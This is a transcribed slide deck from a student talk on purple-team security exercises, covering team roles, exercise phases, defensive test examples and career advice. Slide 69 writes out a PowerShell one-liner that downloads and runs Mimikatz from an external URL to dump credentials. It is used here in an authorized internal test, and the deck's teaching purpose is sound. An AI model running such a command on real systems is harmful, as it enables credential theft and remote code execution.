UOIT Purple Team - Student Edition 2017
2 likes320 views
This is a talk I presented to students at UOIT. Edited to be more relevant for networking / security 1st and 2nd year students
Convert to study materialsBETA
Transform any presentation into ready-made study materialselect from outputs like summaries, definitions, and practice questions.
![@haydnjohnson
Example 2 - Credentials in
Memory
Thumbs up success gift] / image](https://image.slidesharecdn.com/uoit1-171026132835/85/UOIT-Purple-Team-Student-Edition-2017-73-320.jpg)
![@haydnjohnson
Example 5 - Lateral Movement
OpenDLP Video Reference
Bsides Cleveland 2017
Blue-Teamin' on a Budget [of Zero]
https://www.youtube.com/watch?v=77M0aO2F2fU](https://image.slidesharecdn.com/uoit1-171026132835/85/UOIT-Purple-Team-Student-Edition-2017-110-320.jpg)
UOIT Purple Team - Student Edition 2017
- 1. @haydnjohnson Purple Team what, why, how, even Students - Feel free to reach out to me and ask any questions. We gotta look after our own Canadians
- 2. @haydnjohnson Whoami Haydn Johnson Security Analyst | Manager | Purple Teamer Points (points.com) @haydnjohnson Talks: Bsides, Circle City Con, HackFest, SecTor. NolaCon Offsec, Purple Team, Gym?? http://www.slideshare.net/HaydnJohnson
- 4. @haydnjohnson 1. Outline give a summary of (something).
- 5. @haydnjohnson Outline Terminology Security in General Red Team Blue Team What is Purple Teaming Core concept Process Togetherness Examples of Purple Teaming NMap Mimikatz Attachment Testing Table Top BloodHound OpenDLP
- 6. @haydnjohnson Full disclosure Most slides taken from my Purple Team OWASP Austin Talk Re-adjusted for students
- 8. @haydnjohnson What is this security thing? No clear definition! Many different parts of security CIA Triangle
- 9. @haydnjohnson What is this security thing? CONFIDENTIALITY INTEGRITY AVAILABILITY
- 10. @haydnjohnson What is this security thing? AVAILABILITY Business only see:
- 11. @haydnjohnson What is this security thing? Types of Jobs: Security Manager Intrusion Analyst Incident Responder Policy Analyst GRC / Audit Penetration Tester Red Teamer Exploit Developer Threat Intelligence + MANY MORE
- 12. @haydnjohnson Purple Team OR Questions / Career Discussion
- 15. @haydnjohnson Terminology Vulnerability Assessment Person - Run Vuln Scanner....hey client you suck Penetration Tester - Metasploit / MSF PRO (FTW)...hey client you suck Red Teaming - Phish, move laterally, find sensitive stuff, maybe custom implant...hey client you suck Purple Teaming - You did all the above, but got to charge for an extra body and to tell the client how they suck in person
- 16. @haydnjohnson Terminology Red Teaming - Red Team engagements are the full spectrum warfare of security assessments. In a red team engagement, the consultants attack the client organization using physical means, social engineering, and technological avenues. From: http://winterspite.com/security/phrasing/
- 18. @haydnjohnson From: Chris Nickerson Lares Consulting
- 19. @haydnjohnson Terminology Blue Team Network defenders Support Firewalls | Blinky Boxes Responders
- 20. @haydnjohnson Terminology Purple Team Working together to achieve the ultimate goal of making the organization more secure different threats & attacker mindset incident detection and response policy and procedures tuning of controls
- 21. @haydnjohnson
- 23. @haydnjohnson Purple Team Conducting focused pentesting (up to Red Teaming) with clear training objectives for the Blue Team. It isn't a "can you get access to X" exercise it is a "train the Blue Team on X" exercise. The pentesting activities are a means to conduct realistic training.
- 24. @haydnjohnson Purple Team Primary result of the exercise is to create an intrusion event (aka get caught) to test instrumentation (host/ network), validate detection processes and procedures, validate protections in place, force response procedures and post mortems. Differs from Red Team where primary goal is to NOT get caught
- 26. @haydnjohnson 3. Cyber Exercises MITRE cyber exercise playbook https://www.mitre.org/sites/default/files/publications/pr_14-3929-cyber-exercise-playbook.pdf
- 27. @haydnjohnson
- 28. @haydnjohnson Events / Injects Events - generally executed by the Red Team to elicit responses from the Blue Team in specific phases, focused on the objectives of the exercise.
- 29. @haydnjohnson Different Teams within cyber exercises
- 30. @haydnjohnson Exercises - Teams ECG GREY RED BLUE
- 31. @haydnjohnson Exercises - Teams Exercise Control Group Take information from other teams and make decision to ensure the exercise is controlled and reaches its goals. IR Manager Team Lead VP ECG
- 32. @haydnjohnson Exercises - Teams Gray Team / Observers Observe the Blue Team's reaction or non-reaction and report back to ECG. Ongoing process IR Manager Team Lead VP GREY
- 35. @haydnjohnson Phases of a Cyber Exercise Plan Execution Lessons Learned
- 37. @haydnjohnson Exercises - Planning By failing to prepare, you are preparing to fail. Benjamin Franklin Everything needs consideration, pros, cons and a plan! 1. Brainstorming 2. Action Items 3. Budget / Approval
- 38. @haydnjohnson Exercises - Planning Each team needs to know the end goals (except Blue) Red Team needs to know what injects and when. Goals: 1. To prevent confusion 2. Finalize Objectives 3. Identify if training is required 4. Decide on Use Cases
- 39. @haydnjohnson Exercises - Ideas Initial Weakness New technology New Team Test assumption Budget Devils advocate
- 41. @haydnjohnson Exercises - Execution Execution Go Time Observe, Change, Observe Be Dynamic
- 42. @haydnjohnson Exercise Control Group Red Team Training Audience Observers 1 RT tasked with action
- 43. @haydnjohnson Exercise Control Group Red Team Training Audience Observers 1 2 RT tasked with action Execute inject / event
- 44. @haydnjohnson Exercise Control Group Red Team Training Audience Observers 1 2 3 Collects information RT tasked with action Execute inject / event
- 45. @haydnjohnson Exercise Control Group Red Team Training Audience Observers 1 2 3 4 Collects information Feedback to ECG RT tasked with action Execute inject / event
- 46. @haydnjohnson Exercises - Execution What if no response? No Alerts?
- 47. @haydnjohnson Exercise Control Group Red Team Training Audience Observers ! Check for hackers.fu
- 48. @haydnjohnson Exercise Control Group Red Team Training Audience Observers ! Check alert for mal.exe
- 49. @haydnjohnson Exercises - Lessons Learned What observations were made during the exercise. What went well, what didnt Positive and negative - constructive
- 50. @haydnjohnson Exercises - Lessons Learned Internally we need to prepare better Ensure findings are document Think of more alternative tests
- 51. @haydnjohnson Exercises - Lessons Learned Exercise Good Bad Improvements Follow-up
- 52. @haydnjohnson Exercises - Lessons Learned Collect Information from everyone Strengthen future exercises Exercise Control Group Red Team Training Audience Observers
- 54. @haydnjohnson Nmap Mimikatz Malicious Attachment Testing BloodHound Tabletop Exercise OpenDLP
- 56. @haydnjohnson Example 1 - Nmap # of People Required: 1 Level of knowledge required: Little Documentation online: Many Time to Test Minimal Disruption to Business None
- 57. @haydnjohnson Example 1 - Nmap Test if Nmap / Port scans can be seen internally or externally What do the alerts look like?
- 58. @haydnjohnson Example 1 - Nmap Start Basic Increase complexity Fragmentation
- 59. @haydnjohnson Example 1 - Nmap $END POINT SOLUTION catches Nmap $EPS misses fragmentation / slow scans Each workstation gives ALERT Try with Avast, McAfee, Symantec etc
- 60. @haydnjohnson Example 1 - Nmap https://nmap.org/book/man-bypass-firewalls-ids.html
- 61. @haydnjohnson Example 1 - Nmap Why Nmap? APT wont use Nmap It is a start Simple & cheap Test current technology
- 62. @haydnjohnson Example 1 - PowerShell Advancing the exercise
- 64. @haydnjohnson Example 2- Credentials in Memory # of People Required: 1 -2 Level of knowledge required: Little Documentation online: Many Time to Test Minimal Disruption to Business None
- 65. @haydnjohnson Example 2- Credentials in Memory Helpdesk / Ops wants a secure way to remotely manage workstation(s). RDP | VNC - no thanks Want to use PowerShell Remoting because easier and secure https://blog.netspi.com/powershell-remoting-cheatsheet/
- 66. @haydnjohnson Example 2- Credentials in Memory Requirements Ease of use Secure Auditbility Research shows this is possible
- 67. @haydnjohnson Example 2- Credentials in Memory Steps: Before PS-Remoting After PS-Remoting
- 68. @haydnjohnson Example 2- Credentials in Memory Need to know for sure Want to test credentials are safe See for self Mimikatz comes in
- 69. @haydnjohnson Example 2- Credentials in Memory Command Run: powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds | Out-File pre.txt http://carnal0wnage.attackresearch.com/2013/10/dumping-domains-worth-of-pa sswords-with.html
- 70. @haydnjohnson Example 2- Credentials in Memory Dumping credentials
- 71. @haydnjohnson Example 2- Credentials in Memory PS-Remote
- 72. @haydnjohnson Example 2- Credentials in Memory Compare
- 73. @haydnjohnson Example 2 - Credentials in Memory Thumbs up success gift] / image
- 74. @haydnjohnson Example 2- Credentials in Memory Success! Need to document Have justification to Implement! Security Gives sign off!
- 76. @haydnjohnson Example 3 - Malicious Attachment Testing <Email> is great at filtering malicious emails, attachments etc. We want to see what gets through to know what to expect What could get through
- 77. @haydnjohnson Example 3 - Malicious Attachment Testing Malicious File Maker @carnal0wnage https://github.com/carnal0wnage/malicious_file_make r
- 78. @haydnjohnson Example 3 - Malicious Attachment Testing Automates sending
- 79. @haydnjohnson Example 3 - Malicious Attachment Testing AV Pop-Ups
- 80. @haydnjohnson Example 3 - Malicious Attachment Testing
- 81. @haydnjohnson Example 3 - Malicious Attachment Testing
- 82. @haydnjohnson Example 3 - Malicious Attachment Testing Not script kiddie friendly
- 83. @haydnjohnson Example 3 - Malicious Attachment Testing Some attachments you cannot send
- 84. @haydnjohnson Example 3 - Malicious Attachment Testing Receiving file attachments
- 85. @haydnjohnson Example 3 - Malicious Attachment Testing The goal: Confirm email attachment filtering Confirm attachments that bypass Document findings for reference Potential defenses / future steps
- 86. @haydnjohnson Example 3 - Malicious Attachment Testing Which allows us: Potential tuning to block file types Research file types for use in the wild Identification of compensating controls
- 88. @haydnjohnson Example 4 - Domain Admin Paths # of People Required: 1 -2 Level of knowledge required: Enough to install the tool Documentation online: Installation instructions Time to Test Minimal Disruption to Business Potential to pop alerts
- 89. @haydnjohnson Example 4 - Domain Admin Paths Goals: Identify Domain Admins Identify derivative admins Weakness in the chain of trust
- 90. @haydnjohnson Example 4 - Domain Admin Paths BloodHound command: https://blog.stealthbits.com/attacking-active-directory-permissions-with-bloodhound/ https://wald0.com/?p=112 https://github.com/BloodHoundAD/BloodHound/wiki/Getting-started
- 91. @haydnjohnson Example 4 - Domain Admin Paths Tested with helpdesk access
- 92. @haydnjohnson Example 4 - Domain Admin Paths Mystery account SUPERHERO identified via ACLs
- 93. @haydnjohnson Example 4 - Domain Admin Paths Follow up on mystery account Create Ticket Does it require the access it has? Test with a group that has less access
- 95. @haydnjohnson Example 4 - Table Top Exercise # of People Required: Many Level of knowledge required: Varied Documentation online: Yes Time to Test Long term Disruption to Business 1 day +
- 96. @haydnjohnson Example 4 - Table Top Exercise Goals: Raise awareness Practice before it happens
- 97. @haydnjohnson Example 4 - Table Top Exercise Pre Hack During Post https://www.sans.org/reading-room/whitepapers/analyst/killing-advanced-threats-tracks-intelligent- approach-attack-prevention-35302
- 98. @haydnjohnson Example 4 - Table Top Exercise Pre Hack $Group Threaten Company https://www.sans.org/reading-room/whitepapers/analyst/killing-advanced-threats-tracks-intelligent- approach-attack-prevention-35302
- 99. @haydnjohnson
- 100. @haydnjohnson Example 4 - Table Top Exercise Response A
- 101. @haydnjohnson Example 4 - Table Top Exercise Response B
- 102. @haydnjohnson Example 4 - Table Top Exercise ECURITY C - LEVEL PR IT
- 103. @haydnjohnson Example 4 - Table Top Exercise Technical Response IR Hardening Public Response Disclosure Insurance
- 104. @haydnjohnson Example 4 - Table Top Exercise Do this for each stage: Pre Hack During Post Hack
- 106. @haydnjohnson Example 5 - Lateral Movement # of People Required: 1-2 Level of knowledge required: Ability to find network shares Documentation online: Yes Time to Test hours Disruption to Business Minimal
- 107. @haydnjohnson Example 5 - Lateral Movement Goals: Is there sensitive information at rest? What data could be accessed on network shares
- 108. @haydnjohnson Please note Exercises do not have to be offsec tool focused Attacker mindset is important Testing assumptions
- 109. @haydnjohnson Example 5 - Lateral Movement OpenDLP Data Loss prevention tool Identifies sensitive data at rest on thousands of systema Not easy to install https://github.com/ezarko/opendlp
- 110. @haydnjohnson Example 5 - Lateral Movement OpenDLP Video Reference Bsides Cleveland 2017 Blue-Teamin' on a Budget [of Zero] https://www.youtube.com/watch?v=77M0aO2F2fU
- 111. @haydnjohnson Example 5 - Lateral Movement Download OVA Transfer sc.exe from XP 32bit Install browser sert Start apache connect
- 112. @haydnjohnson Example 5 - Lateral Movement Issues with install: sc.exe 32bit Accessing web server Solution: XP http://www.makeuseof.com/tag/download-wi ndows-xp-for-free-and-legally-straight-from- microsoft-si/
- 113. @haydnjohnson Example 5 - Lateral Movement Import cert
- 114. @haydnjohnson Example 5 - Lateral Movement Looks like this
- 115. @haydnjohnson Example 5 - Lateral Movement PII Credit card data etc
- 116. @haydnjohnson Example 5 - Lateral Movement Report looks like:
- 117. @haydnjohnson Example 5 - Lateral Movement This is still a work in progress. Wondering how I can create a process out of it
- 119. @haydnjohnson 5. Career / Infosec Stuff Ask questions. Open Forum
- 120. @haydnjohnson My Career in Depth
- 121. @haydnjohnson From Australia Masters of I.T - infosec specialization Internship @ Deloitte Australia Graduate program @ Deloitte Move to Deloitte Canada Move to KPMG Canada Move to Points
- 123. @haydnjohnson Infosec Twitter General information Feeling part of a community Mentors / Mentees Motivation
- 125. @haydnjohnson Speaking / Publicity Local Bsides Toronto CO submission to Circle City Con CO Submission to HackFest BsidesLV Mentee program (Proving grounds) CO Submission to SecTor (Chris Gates mentoring)
- 126. @haydnjohnson Speaking / Publicity Benefits Knowing your topic enough to speak Communication Skills Networking Speaking itself
- 127. @haydnjohnson Github
- 128. @haydnjohnson Github I sort of have one Lots of dead end projects Contributed to Gdog
- 129. @haydnjohnson GitHub Benefits Shows more than a CV Contribute to known projects Little projects that are recorded